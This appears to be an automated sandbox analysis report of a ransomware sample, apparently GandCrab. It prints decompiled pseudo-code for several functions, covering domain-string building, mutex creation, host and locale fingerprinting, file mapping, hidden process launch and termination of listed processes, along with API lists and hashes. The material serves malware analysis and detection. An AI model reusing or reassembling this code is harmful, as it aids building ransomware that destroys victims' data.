                                        			E0FC65060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				void* _t30;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfc704c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xfc704d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8); // executed
						}
						_t30 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4); // executed
						_t39 = _t30;
						_t41 = _t39; // executed
						E0FC64E90(_t41, _v12, _t48); // executed
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000); // executed
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}





























                                        0x0fc65066
                                        0x0fc65076
                                        0x0fc65081
                                        0x0fc65086
                                        0x0fc6508c
                                        0x0fc6509b
                                        0x0fc650a1
                                        0x0fc650a6
                                        0x0fc650aa
                                        0x0fc650b1
                                        0x0fc650b8
                                        0x0fc650bf
                                        0x0fc650c3
                                        0x0fc650c6
                                        0x0fc650cc
                                        0x0fc650ce
                                        0x0fc650d3
                                        0x0fc650d9
                                        0x0fc650db
                                        0x0fc650e0
                                        0x0fc650e2
                                        0x0fc650e2
                                        0x0fc650e6
                                        0x0fc650e7
                                        0x0fc650ed
                                        0x0fc650f2
                                        0x0fc650f4
                                        0x0fc650f7
                                        0x0fc650f7
                                        0x0fc650fc
                                        0x0fc65103
                                        0x0fc65103
                                        0x0fc65121
                                        0x0fc6512a
                                        0x0fc6512d
                                        0x0fc6512f
                                        0x0fc65134
                                        0x0fc6513d
                                        0x0fc65145
                                        0x00000000
                                        0x00000000
                                        0x0fc6514e
                                        0x0fc65154
                                        0x0fc65157
                                        0x0fc65157
                                        0x0fc6515c
                                        0x0fc65166
                                        0x0fc65177
                                        0x0fc6517d
                                        0x0fc6517d
                                        0x0fc65185

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0FC650C6
                                        • Sleep.KERNEL32(000003E8), ref: 0FC65103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FC65111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FC65121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FC6513D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6514E
                                        • wsprintfW.USER32 ref: 0FC65166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC65177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 1c81a74af8e06631adf22ad03023476d8a6b95ebe680a25985c3a19e85b5981e
                                        • Instruction ID: 2edbc14b0f9c90f8024c9e715ef33eda3137c4c6396016704709556d29e4e3d4
                                        • Opcode Fuzzy Hash: 1c81a74af8e06631adf22ad03023476d8a6b95ebe680a25985c3a19e85b5981e
                                        • Instruction Fuzzy Hash: DF31C871E04305ABD700CFA5DC87B9E7BB8EF44715F100125F746B6281D77456008B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6465C
                                        • lstrcpyW.KERNEL32 ref: 0FC6467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64686
                                        • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 324df26290ae99c3357ef31ee863873b036ab39477a6643b79d2adfbd90427f1
                                        • Instruction ID: 96f8bc3fc03f9fe4b1a49c6e273b256d4f4d3e807cf5cdc01a40e5bafe9be030
                                        • Opcode Fuzzy Hash: 324df26290ae99c3357ef31ee863873b036ab39477a6643b79d2adfbd90427f1
                                        • Instruction Fuzzy Hash: 162135312683117BE228A725DC8BF7F765CDB40B15F500628F706660D1AED8B918C7E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC67C10 Relevance: 12.6, APIs: 10, Instructions: 67COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC67C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}





                                        0x0fc67c11
                                        0x0fc67c1d
                                        0x0fc67c29
                                        0x0fc67c29
                                        0x0fc67c2f
                                        0x0fc67c3b
                                        0x0fc67c3b
                                        0x0fc67c41
                                        0x0fc67c4d
                                        0x0fc67c4d
                                        0x0fc67c53
                                        0x0fc67c5f
                                        0x0fc67c5f
                                        0x0fc67c65
                                        0x0fc67c71
                                        0x0fc67c71
                                        0x0fc67c77
                                        0x0fc67c83
                                        0x0fc67c83
                                        0x0fc67c89
                                        0x0fc67c95
                                        0x0fc67c95
                                        0x0fc67c9b
                                        0x0fc67ca7
                                        0x0fc67ca7
                                        0x0fc67cad
                                        0x0fc67cb9
                                        0x0fc67cb9
                                        0x0fc67cc2
                                        0x00000000
                                        0x0fc67cd1
                                        0x0fc67cd5

                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FC646DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC67CD1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 498ac34a1a87bc658a4c0164eb5c5b9222f13b51b5c2603dca27c68d1c1b786f
                                        • Instruction ID: 0b8e7829fe30d854d750837dccb17a85898d18ccbc0e62e4919cf6ef7df393e6
                                        • Opcode Fuzzy Hash: 498ac34a1a87bc658a4c0164eb5c5b9222f13b51b5c2603dca27c68d1c1b786f
                                        • Instruction Fuzzy Hash: 6921DD30244B04FAE7762A15DD4BF96B6E1BF40B09F654828E2C2248F18FF57599EF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62890 Relevance: 12.1, APIs: 8, Instructions: 90fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E0FC62890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FC63030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FC63030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E0FC63030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E0FC682A0(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E0FC62830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}





















                                        0x0fc62890
                                        0x0fc62899
                                        0x0fc6289b
                                        0x0fc628ab
                                        0x0fc628b1
                                        0x0fc628b6
                                        0x0fc628f9
                                        0x0fc62901
                                        0x0fc628b8
                                        0x0fc628c0
                                        0x0fc628c3
                                        0x0fc628ca
                                        0x0fc628cf
                                        0x0fc628d0
                                        0x0fc628d8
                                        0x0fc628e5
                                        0x0fc628eb
                                        0x0fc628f0
                                        0x0fc6290a
                                        0x0fc62910
                                        0x0fc62914
                                        0x0fc62916
                                        0x0fc6291d
                                        0x0fc6291f
                                        0x0fc62920
                                        0x0fc62920
                                        0x0fc62923
                                        0x0fc62926
                                        0x0fc6292b
                                        0x0fc6292b
                                        0x0fc6292e
                                        0x0fc62937
                                        0x0fc6293f
                                        0x0fc62942
                                        0x0fc62942
                                        0x0fc62951
                                        0x0fc62954
                                        0x0fc6295e
                                        0x0fc628f2
                                        0x0fc628f3
                                        0x00000000
                                        0x0fc628f3
                                        0x0fc628f0

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0FC62C02), ref: 0FC628AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0FC62C02), ref: 0FC628BA
                                        • CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FC62C02), ref: 0FC628E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0FC62C02), ref: 0FC628F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0FC62C02), ref: 0FC6290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FC62C02), ref: 0FC62942
                                        • CloseHandle.KERNEL32(?,?,?,0FC62C02), ref: 0FC62951
                                        • CloseHandle.KERNEL32(00000000,?,?,0FC62C02), ref: 0FC62954
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: e20f1cb594ab6612d0acf702c60ff47460383c74387f1e27b6848d46f3f9fcca
                                        • Instruction ID: 4b4095c0a806bea7b940f39d1836209fe2ecdec50056eb24457ebbf8d8ad505b
                                        • Opcode Fuzzy Hash: e20f1cb594ab6612d0acf702c60ff47460383c74387f1e27b6848d46f3f9fcca
                                        • Instruction Fuzzy Hash: 20212971A1921ABFE7106B759CC7FBE776CDB45675F000224FE01F2281DA38AD1556B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E0FC64C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				int _t20;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FC69010( &_v92, 0, 0x44);
				_t15 =  *0xfc72a6c; // 0x738
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfc72a68; // 0x748
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
				if(_t20 != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}









                                        0x0fc64c4c
                                        0x0fc64c52
                                        0x0fc64c54
                                        0x0fc64c59
                                        0x0fc64c5e
                                        0x0fc64c66
                                        0x0fc64c69
                                        0x0fc64c6c
                                        0x0fc64c71
                                        0x0fc64c78
                                        0x0fc64c7d
                                        0x0fc64c88
                                        0x0fc64c9f
                                        0x0fc64ca7
                                        0x0fc64cbd
                                        0x0fc64cc8
                                        0x0fc64ca9
                                        0x0fc64cb3
                                        0x0fc64cb3

                                        APIs
                                        • _memset.LIBCMT ref: 0FC64C59
                                        • CreateProcessW.KERNEL32 ref: 0FC64C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0FC64CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FC64CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FC64CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: 64d86eed99413b1c13c576b7b5f24e43ec57ca83f3c95fe27599b998bb79f45d
                                        • Instruction ID: dca1390d63f15c522b6c569ec1a09a9591e025423066f5facec3f4b71037e259
                                        • Opcode Fuzzy Hash: 64d86eed99413b1c13c576b7b5f24e43ec57ca83f3c95fe27599b998bb79f45d
                                        • Instruction Fuzzy Hash: 7C018471E44319ABDB20DFA5DC46BDE7BB8EF08721F100116F608F6180E7B525548B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC648A8 Relevance: 10.5, APIs: 7, Instructions: 46stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC648A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}












                                        0x0fc648a8
                                        0x0fc648a8
                                        0x0fc648b0
                                        0x0fc648b0
                                        0x0fc648b5
                                        0x0fc648bd
                                        0x0fc648cb
                                        0x0fc648cf
                                        0x0fc648d4
                                        0x0fc648e1
                                        0x0fc648e1
                                        0x0fc648cf
                                        0x0fc648eb
                                        0x0fc648ec
                                        0x0fc648ec
                                        0x0fc648f2
                                        0x00000000
                                        0x00000000
                                        0x0fc648f4
                                        0x0fc648f4
                                        0x0fc648fa
                                        0x0fc64900
                                        0x0fc64900
                                        0x0fc64905
                                        0x0fc648a4
                                        0x0fc648b0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc648b0
                                        0x0fc64909
                                        0x0fc64913
                                        0x0fc64913
                                        0x0fc6491a
                                        0x0fc64922
                                        0x0fc648b0
                                        0x0fc648b5
                                        0x0fc648bd
                                        0x0fc648cb
                                        0x0fc648cf
                                        0x0fc648d4
                                        0x0fc648e1
                                        0x0fc648e1
                                        0x0fc648cf
                                        0x0fc648eb
                                        0x0fc648ec
                                        0x0fc648ec
                                        0x0fc648ef

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FC648B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FC648C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0FC648D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC648E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0FC648FA
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC64913
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC6491A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 3573210778-0
                                        • Opcode ID: e40dfb4f46076abf7cdd25228d6964b456959c77013495e2e910e85bd2e81a8a
                                        • Instruction ID: 42b424f9f6cbefc49eaab01ab97803ffbbebe5487e7f7b980f761b3f739ab1b4
                                        • Opcode Fuzzy Hash: e40dfb4f46076abf7cdd25228d6964b456959c77013495e2e910e85bd2e81a8a
                                        • Instruction Fuzzy Hash: C501DB36108202EFD7159F52EC86F5A7368EF85712F100024FA0AE6041DF74A9198B61
                                        Uniqueness

